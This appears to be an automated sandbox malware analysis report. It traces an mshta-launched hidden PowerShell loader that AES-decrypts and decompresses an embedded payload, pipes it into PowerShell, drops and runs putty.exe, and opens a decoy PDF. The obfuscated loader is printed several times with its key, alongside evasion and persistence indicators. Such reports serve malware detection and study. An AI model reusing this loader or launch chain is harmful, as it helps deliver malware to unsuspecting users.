Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: "C:\Windows\system32\cmd.exe" /c powershell.exe $fNaPOP = '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';$mehLaZDc = 'd2Z5WFdPd1VKSXdqYXNCRnhTRWRuSFBtZGJqWlFTSXo=';$PYLEHHT = New-Object 'System.Security.Cryptography.AesManaged';$PYLEHHT.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PYLEHHT.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PYLEHHT.BlockSize = 128;$PYLEHHT.KeySize = 256;$PYLEHHT.Key = [System.Convert]::FromBase64String($mehLaZDc);$BWoPS = [System.Convert]::FromBase64String($fNaPOP);$MkdtxWXs = $BWoPS[0..15];$PYLEHHT.IV = $MkdtxWXs;$IaLmFBNdk = $PYLEHHT.CreateDecryptor();$MvUYGVuHe = $IaLmFBNdk.TransformFinalBlock($BWoPS, 16, $BWoPS.Length - 16);$PYLEHHT.Dispose();$cxVQsOlZ = New-Object System.IO.MemoryStream( , $MvUYGVuHe );$kPnxbBu = New-Object System.IO.MemoryStream;$uGBpShIzT = New-Object System.IO.Compression.GzipStream $cxVQsOlZ, ([IO.Compression.CompressionMode]::Decompress);$uGBpShIzT.CopyTo( $kPnxbBu );$uGBpShIzT.Close();$cxVQsOlZ.Close();[byte[]] $bsMmu = $kPnxbBu.ToArray();$FPimSbR = [System.Text.Encoding]::UTF8.GetString($bsMmu);$FPimSbR | powershell -
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($mehLaZDc);$BWoPS = [System.Convert]::FromBase64String($fNaPOP);$MkdtxWXs = $BWoPS[0..15];$PYLEHHT.IV = $MkdtxWXs;$IaLmFBNdk = $PYLEHHT.CreateDecryptor();$MvUYGVuHe = $IaLmFBNdk.Trans
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_04872D04 pushfd ; iretd 5_2_04872D05
Source: C:\Users\user\putty.exe | Code function: 10_2_0045126F push ecx; ret 10_2_0045127F
Source: C:\Users\user\putty.exe | Code function: 10_2_0044ED20 push eax; ret 10_2_0044ED34
Source: C:\Users\user\putty.exe | Code function: 10_2_0044ED20 push eax; ret 10_2_0044ED5C
Source: C:\Users\user\putty.exe | Code function: 10_2_0044CF54 pushad ; iretd 10_2_0044CF55
Source: C:\Users\user\putty.exe | Code function: 10_2_004451A7 RegOpenKeyA,GetProcAddress,RegQueryValueExA,RegQueryValueExA,LoadLibraryA,RegCloseKey,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress 10_2_004451A7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\putty.exe

Boot Survival

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\putty.exe
Source: C:\Users\user\putty.exe | Code function: 10_2_00440456 IsIconic,ShowWindow 10_2_00440456
Source: C:\Users\user\putty.exe | Code function: 10_2_004424A0 SetWindowTextA,SetWindowTextA,SetWindowTextA,PostQuitMessage,CreateCaret,ShowCaret,MessageBoxA,DestroyWindow,HideCaret,BeginPaint,SelectPalette,RealizePalette,SelectObject,CreateSolidBrush,SelectObject,CreatePen,SelectObject,IntersectClipRect,ExcludeClipRect,Rectangle,SelectObject,DeleteObject,DeleteObject,SelectObject,DeleteObject,GetStockObject,GetStockObject,SelectObject,GetStockObject,SelectObject,EndPaint,ShowCaret,DestroyCaret,TranslateMessage,EnableMenuItem,IsZoomed,IsZoomed,ShowWindow,DeleteObject,IsZoomed,GetWindowLongA,GetWindowLongA,GetWindowLongA,SetWindowPos,SetWindowPos,SetWindowLongA,SetWindowLongA,SetWindowPos,IsZoomed,IsIconic,SetWindowTextA,InvalidateRect,SendMessageA,PostMessageA,CreateFileMappingA,MapViewOfFile,UnmapViewOfFile,GetModuleFileNameA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CloseHandle,ImmGetContext,ImmGetCompositionStringW,ImmGetCompositionStringW,ImmReleaseContext,ImmGetContext,ImmSetCompositionFontA,ImmReleaseContext,KillTimer,GetCursorPos,TrackPopupMenu,GetCapture,GetScrollInfo,InvalidateRect,InvalidateRect,GetCursorPos,SendMessageA,SetCapture,ReleaseCapture,RealizePalette,UpdateColors,RealizePalette,UpdateColors,DefWindowProcA,GetKeyboardState,ScreenToClient 10_2_004424A0
Source: C:\Users\user\putty.exe | Code function: 10_2_0044053C IsIconic 10_2_0044053C
Source: C:\Users\user\putty.exe | Code function: 10_2_0043F5AF _strlen,_strcat,IsIconic,SetWindowTextA 10_2_0043F5AF
Source: C:\Users\user\putty.exe | Code function: 10_2_0043D666 IsIconic,GetWindowPlacement,GetWindowRect 10_2_0043D666
Source: C:\Users\user\putty.exe | Code function: 10_2_0043F60F _strlen,_strcat,IsIconic,SetWindowTextA 10_2_0043F60F
Source: C:\Users\user\putty.exe | Code function: 10_2_004451A7 RegOpenKeyA,GetProcAddress,RegQueryValueExA,RegQueryValueExA,LoadLibraryA,RegCloseKey,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress 10_2_004451A7
Source: C:\Windows\SysWOW64\mshta.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7156 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5196 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 668 Thread sleep count: 2570 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2292 Thread sleep count: 134 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1036 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3508 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2200 Thread sleep count: 4643 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2200 Thread sleep count: 4001 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1296 Thread sleep time: -21213755684765971s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5372 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6032 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\putty.exe Code function: 10_2_0044A49B GetLocalTime followed by cmp: cmp word ptr [ebp-10h], ax and CTI: jc 0044A4E5h
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1888
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1360
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2570
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4643
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4001
Source: C:\Users\user\putty.exe API coverage: 5.8 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Users\user\putty.exe Code function: 10_2_0045114E VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect
Source: C:\Users\user\putty.exe Code function: 10_2_004486F8 GetWindowsDirectoryA,FindFirstFileA,FindNextFileA,FindClose,GetCurrentProcessId,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: mshta.exe, 00000000.00000002.1425618883.0000000002D78000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: putty.exe, 0000000A.00000002.2599940040.000000000068E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllR
Source: mshta.exe, 00000000.00000002.1425618883.0000000002D78000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: C:\Users\user\putty.exe Code function: 10_2_004451A7 RegOpenKeyA,GetProcAddress,RegQueryValueExA,RegQueryValueExA,LoadLibraryA,RegCloseKey,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy unrestricted start-process 'cmd.exe' -windowstyle hidden -argumentlist {/c powershell.exe $fnapop = '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';$mehlazdc = 'd2z5wfdpd1vksxdqyxncrnhtrwrusfbtzgjqwlftsxo=';$pylehht = new-object 'system.security.cryptography.aesmanaged';$pylehht.mode = [system.security.cryptography.ciphermode]::ecb;$pylehht.padding = [system.security.cryptography.paddingmode]::zeros;$pylehht.blocksize = 128;$pylehht.keysize = 256;$pylehht.key = [system.convert]::frombase64string($mehlazdc);$bwops = [system.convert]::frombase64string($fnapop);$mkdtxwxs = $bwops[0..15];$pylehht.iv = $mkdtxwxs;$ialmfbndk = $pylehht.createdecryptor();$mvuygvuhe = $ialmfbndk.transformfinalblock($bwops, 16, $bwops.length - 16);$pylehht.dispose();$cxvqsolz = new-object system.io.memorystream( , $mvuygvuhe );$kpnxbbu = new-object system.io.memorystream;$ugbpshizt = new-object system.io.compression.gzipstream $cxvqsolz, ([io.compression.compressionmode]::decompress);$ugbpshizt.copyto( $kpnxbbu );$ugbpshizt.close();$cxvqsolz.close();[byte[]] $bsmmu = $kpnxbbu.toarray();$fpimsbr = [system.text.encoding]::utf8.getstring($bsmmu);$fpimsbr | powershell - }
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c powershell.exe $fnapop = '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';$mehlazdc = 'd2z5wfdpd1vksxdqyxncrnhtrwrusfbtzgjqwlftsxo=';$pylehht = new-object 'system.security.cryptography.aesmanaged';$pylehht.mode = [system.security.cryptography.ciphermode]::ecb;$pylehht.padding = [system.security.cryptography.paddingmode]::zeros;$pylehht.blocksize = 128;$pylehht.keysize = 256;$pylehht.key = [system.convert]::frombase64string($mehlazdc);$bwops = [system.convert]::frombase64string($fnapop);$mkdtxwxs = $bwops[0..15];$pylehht.iv = $mkdtxwxs;$ialmfbndk = $pylehht.createdecryptor();$mvuygvuhe = $ialmfbndk.transformfinalblock($bwops, 16, $bwops.length - 16);$pylehht.dispose();$cxvqsolz = new-object system.io.memorystream( , $mvuygvuhe );$kpnxbbu = new-object system.io.memorystream;$ugbpshizt = new-object system.io.compression.gzipstream $cxvqsolz, ([io.compression.compressionmode]::decompress);$ugbpshizt.copyto( $kpnxbbu );$ugbpshizt.close();$cxvqsolz.close();[byte[]] $bsmmu = $kpnxbbu.toarray();$fpimsbr = [system.text.encoding]::utf8.getstring($bsmmu);$fpimsbr | powershell -
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe $fnapop = 'aaaaaaaaaaaaaaaaaaaaapq3+yyuesdcp30fctt1g8+bllqdeek2rl0/q2v+83d4bffpss5iju6kfes1jzaaiijofb3qbz4arua/p0a2xkjm5iunw72eqrkskcntemtjharvolhxtff2y5wz5p2jtj8qoabdnbfsmoktklgidkmitv4lcg8milukzud9s+wkjzqzjtcjo/2g5kr/8oacycs/ngtky8eujifd3jjz5ylyw3ofjpf3mj9czn20cb8phyfovw8cht0xnvzcfmgo/e8zd5zqzfwg7smpcda2exuzdgajgu5thhwb7zeht3d3pib67d6q7vhjnkgbsiv6zcpofip7s25z6l2wgczc+2l0h4wg5atfmshceyxblkjml3+4vdt9rw3zep3gp2c/hy8udbeid77xxgk3+qrdnhalxw7kxafq6b8jyiffp3403hxtqvgreahvvf8yj2rvmsbdjplrnscmvgd9iqa7oxvubnuww9u2m23jisesq4uz7nhkfbozi8yuxfairoongw7ty7xud6uprxjtiawnnns2saqk/okx7moms6bgvr3yyh/sg2sq5kq7ryejpk4btikllkdmilzqnu8d/xf1cezaopnm27zbagy2uyzvlziepnimut6tkfecr+kqcrmydbfcsk/3rbypdzneodmrrjzuejpskcyj60ix9evqybktmtpkyyt4ygrr/6uu6i+3tyllqxzjjhnngbzyxvxwmnys9nzndpphf2bmyelnennqsng8rs0j4jtd9ozojo6orwxfy54hd1omi8rzby565/grqubrf9knj3pkkkx5lo7jjjkda49arw/ygaivigrgvzkfqolkwinuh3agyb/7frzuykelczmwxhr7gpjmxmpop3scshlt6p522cvjaclhmbxh8ebvj89klig5dng0o1y0kv3zj8qkxzcmfiht+wa0p7c89p9ihf41cm6qus0cjzqxjh76oprm8iujlcd9smmxukre8soplrje+s8rbdtv';$mehlazdc = 'd2z5wfdpd1vksxdqyxncrnhtrwrusfbtzgjqwlftsxo=';$pylehht = new-object 'system.security.cryptography.aesmanaged';$pylehht.mode = [system.security.cryptography.ciphermode]::ecb;$pylehht.padding = [system.security.cryptography.paddingmode]::zeros;$pylehht.blocksize = 128;$pylehht.keysize = 256;$pylehht.key = [system.convert]::frombase64string($mehlazdc);$bwops = [system.convert]::frombase64string($fnapop);$mkdtxwxs = $bwops[0..15];$pylehht.iv = $mkdtxwxs;$ialmfbndk = $pylehht.createdecryptor();$mvuygvuhe = $ialmfbndk.transformfinalblock($bwops, 16, $bwops.length - 16);$pylehht.dispose();$cxvqsolz = new-object system.io.memorystream( , $mvuygvuhe );$kpnxbbu = new-object system.io.memorystream;$ugbpshizt = new-object system.io.compression.gzipstream $cxvqsolz, 
([io.compression.compressionmode]::decompress);$ugbpshizt.copyto( $kpnxbbu );$ugbpshizt.close();$cxvqsolz.close();[byte[]] $bsmmu = $kpnxbbu.toarray();$fpimsbr = [system.text.encoding]::utf8.getstring($bsmmu);$fpimsbr
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy unrestricted start-process 'cmd.exe' -windowstyle hidden -argumentlist {/c powershell.exe $fnapop = 'aaaaaaaaaaaaaaaaaaaaapq3+yyuesdcp30fctt1g8+bllqdeek2rl0/q2v+83d4bffpss5iju6kfes1jzaaiijofb3qbz4arua/p0a2xkjm5iunw72eqrkskcntemtjharvolhxtff2y5wz5p2jtj8qoabdnbfsmoktklgidkmitv4lcg8milukzud9s+wkjzqzjtcjo/2g5kr/8oacycs/ngtky8eujifd3jjz5ylyw3ofjpf3mj9czn20cb8phyfovw8cht0xnvzcfmgo/e8zd5zqzfwg7smpcda2exuzdgajgu5thhwb7zeht3d3pib67d6q7vhjnkgbsiv6zcpofip7s25z6l2wgczc+2l0h4wg5atfmshceyxblkjml3+4vdt9rw3zep3gp2c/hy8udbeid77xxgk3+qrdnhalxw7kxafq6b8jyiffp3403hxtqvgreahvvf8yj2rvmsbdjplrnscmvgd9iqa7oxvubnuww9u2m23jisesq4uz7nhkfbozi8yuxfairoongw7ty7xud6uprxjtiawnnns2saqk/okx7moms6bgvr3yyh/sg2sq5kq7ryejpk4btikllkdmilzqnu8d/xf1cezaopnm27zbagy2uyzvlziepnimut6tkfecr+kqcrmydbfcsk/3rbypdzneodmrrjzuejpskcyj60ix9evqybktmtpkyyt4ygrr/6uu6i+3tyllqxzjjhnngbzyxvxwmnys9nzndpphf2bmyelnennqsng8rs0j4jtd9ozojo6orwxfy54hd1omi8rzby565/grqubrf9knj3pkkkx5lo7jjjkda49arw/ygaivigrgvzkfqolkwinuh3agyb/7frzuykelczmwxhr7gpjmxmpop3scshlt6p522cvjaclhmbxh8ebvj89klig5dng0o1y0kv3zj8qkxzcmfiht+wa0p7c89p9ihf41cm6qus0cjzqxjh76oprm8iujlcd9smmxukre8soplrje+s8rbdtv';$mehlazdc = 'd2z5wfdpd1vksxdqyxncrnhtrwrusfbtzgjqwlftsxo=';$pylehht = new-object 'system.security.cryptography.aesmanaged';$pylehht.mode = [system.security.cryptography.ciphermode]::ecb;$pylehht.padding = [system.security.cryptography.paddingmode]::zeros;$pylehht.blocksize = 128;$pylehht.keysize = 256;$pylehht.key = [system.convert]::frombase64string($mehlazdc);$bwops = [system.convert]::frombase64string($fnapop);$mkdtxwxs = $bwops[0..15];$pylehht.iv = $mkdtxwxs;$ialmfbndk = $pylehht.createdecryptor();$mvuygvuhe = $ialmfbndk.transformfinalblock($bwops, 16, $bwops.length - 16);$pylehht.dispose();$cxvqsolz = new-object system.io.memorystream( , $mvuygvuhe );$kpnxbbu = 
new-object system.io.memorystream;$ugbpshizt = new-object system.io.compression.gzipstream $cxvqsolz, ([io.compression.compressionmode]::decompress);$ugbpshizt.copyto( $kpnxbbu );$ugbpshizt.close();$cxvqsolz.close();[byte[]] $bsmmu = $kpnxbbu.toarray();$fpimsbr = [system.text.encoding]::utf8.getstring($bsmmu);$fpimsbr | powershell - }
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe $fnapop = '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';$mehlazdc = 'd2z5wfdpd1vksxdqyxncrnhtrwrusfbtzgjqwlftsxo=';$pylehht = new-object 'system.security.cryptography.aesmanaged';$pylehht.mode = [system.security.cryptography.ciphermode]::ecb;$pylehht.padding = [system.security.cryptography.paddingmode]::zeros;$pylehht.blocksize = 128;$pylehht.keysize = 256;$pylehht.key = [system.convert]::frombase64string($mehlazdc);$bwops = [system.convert]::frombase64string($fnapop);$mkdtxwxs = $bwops[0..15];$pylehht.iv = $mkdtxwxs;$ialmfbndk = $pylehht.createdecryptor();$mvuygvuhe = $ialmfbndk.transformfinalblock($bwops, 16, $bwops.length - 16);$pylehht.dispose();$cxvqsolz = new-object system.io.memorystream( , $mvuygvuhe );$kpnxbbu = new-object system.io.memorystream;$ugbpshizt = new-object system.io.compression.gzipstream $cxvqsolz, ([io.compression.compressionmode]::decompress);$ugbpshizt.copyto( $kpnxbbu );$ugbpshizt.close();$cxvqsolz.close();[byte[]] $bsmmu = $kpnxbbu.toarray();$fpimsbr = [system.text.encoding]::utf8.getstring($bsmmu);$fpimsbr
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $fNaPOP = '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';$mehLaZDc = 'd2Z5WFdPd1VKSXdqYXNCRnhTRWRuSFBtZGJqWlFTSXo=';$PYLEHHT = New-Object 'System.Security.Cryptography.AesManaged';$PYLEHHT.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PYLEHHT.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PYLEHHT.BlockSize = 128;$PYLEHHT.KeySize = 256;$PYLEHHT.Key = [System.Convert]::FromBase64String($mehLaZDc);$BWoPS = [System.Convert]::FromBase64String($fNaPOP);$MkdtxWXs = $BWoPS[0..15];$PYLEHHT.IV = $MkdtxWXs;$IaLmFBNdk = $PYLEHHT.CreateDecryptor();$MvUYGVuHe = $IaLmFBNdk.TransformFinalBlock($BWoPS, 16, $BWoPS.Length - 16);$PYLEHHT.Dispose();$cxVQsOlZ = New-Object System.IO.MemoryStream( , $MvUYGVuHe );$kPnxbBu = New-Object System.IO.MemoryStream;$uGBpShIzT = New-Object System.IO.Compression.GzipStream $cxVQsOlZ, ([IO.Compression.CompressionMode]::Decompress);$uGBpShIzT.CopyTo( $kPnxbBu );$uGBpShIzT.Close();$cxVQsOlZ.Close();[byte[]] $bsMmu = $kPnxbBu.ToArray();$FPimSbR = [System.Text.Encoding]::UTF8.GetString($bsMmu);$FPimSbR | powershell - }
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c powershell.exe $fNaPOP = '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';$mehLaZDc = 'd2Z5WFdPd1VKSXdqYXNCRnhTRWRuSFBtZGJqWlFTSXo=';$PYLEHHT = New-Object 'System.Security.Cryptography.AesManaged';$PYLEHHT.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PYLEHHT.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PYLEHHT.BlockSize = 128;$PYLEHHT.KeySize = 256;$PYLEHHT.Key = [System.Convert]::FromBase64String($mehLaZDc);$BWoPS = [System.Convert]::FromBase64String($fNaPOP);$MkdtxWXs = $BWoPS[0..15];$PYLEHHT.IV = $MkdtxWXs;$IaLmFBNdk = $PYLEHHT.CreateDecryptor();$MvUYGVuHe = $IaLmFBNdk.TransformFinalBlock($BWoPS, 16, $BWoPS.Length - 16);$PYLEHHT.Dispose();$cxVQsOlZ = New-Object System.IO.MemoryStream( , $MvUYGVuHe );$kPnxbBu = New-Object System.IO.MemoryStream;$uGBpShIzT = New-Object System.IO.Compression.GzipStream $cxVQsOlZ, ([IO.Compression.CompressionMode]::Decompress);$uGBpShIzT.CopyTo( $kPnxbBu );$uGBpShIzT.Close();$cxVQsOlZ.Close();[byte[]] $bsMmu = $kPnxbBu.ToArray();$FPimSbR = [System.Text.Encoding]::UTF8.GetString($bsMmu);$FPimSbR | powershell -
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe $fNaPOP = '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';$mehLaZDc = 'd2Z5WFdPd1VKSXdqYXNCRnhTRWRuSFBtZGJqWlFTSXo=';$PYLEHHT = New-Object 'System.Security.Cryptography.AesManaged';$PYLEHHT.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PYLEHHT.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PYLEHHT.BlockSize = 128;$PYLEHHT.KeySize = 256;$PYLEHHT.Key = [System.Convert]::FromBase64String($mehLaZDc);$BWoPS = [System.Convert]::FromBase64String($fNaPOP);$MkdtxWXs = $BWoPS[0..15];$PYLEHHT.IV = $MkdtxWXs;$IaLmFBNdk = $PYLEHHT.CreateDecryptor();$MvUYGVuHe = $IaLmFBNdk.TransformFinalBlock($BWoPS, 16, $BWoPS.Length - 16);$PYLEHHT.Dispose();$cxVQsOlZ = New-Object System.IO.MemoryStream( , $MvUYGVuHe );$kPnxbBu = New-Object System.IO.MemoryStream;$uGBpShIzT = New-Object System.IO.Compression.GzipStream $cxVQsOlZ, ([IO.Compression.CompressionMode]::Decompress);$uGBpShIzT.CopyTo( $kPnxbBu );$uGBpShIzT.Close();$cxVQsOlZ.Close();[byte[]] $bsMmu = $kPnxbBu.ToArray();$FPimSbR = [System.Text.Encoding]::UTF8.GetString($bsMmu);$FPimSbR
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Research.pdf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\putty.exe "C:\Users\user\putty.exe"
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\putty.exe Code function: 10_2_0043E4F6 GetLocaleInfoA
Source: C:\Users\user\putty.exe Code function: 10_2_004557F0 GetLocaleInfoA
Source: C:\Users\user\putty.exe Code function: 10_2_0044F0C7 GetSystemTimeAsFileTime,__aulldiv
Source: C:\Users\user\putty.exe Code function: 10_2_00450E96 _strlen,_strcat,_strncpy,_strncpy,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte
Source: C:\Users\user\putty.exe Code function: 10_2_0044F125 EntryPoint,GetVersionExA,GetModuleHandleA,GetModuleHandleA,GetCommandLineA,GetStartupInfoA,__wincmdln,GetModuleHandleA
Source: C:\Users\user\putty.exe Code function: 10_2_0044675D GetProcAddress,GetUserNameA,GetUserNameA,GetUserNameA
Source: C:\Users\user\putty.exe Code function: 10_2_00448341 socket,setsockopt,htons,inet_addr,htonl,htonl,htons,bind,WSAGetLastError,closesocket,listen,closesocket,WSAGetLastError,closesocket
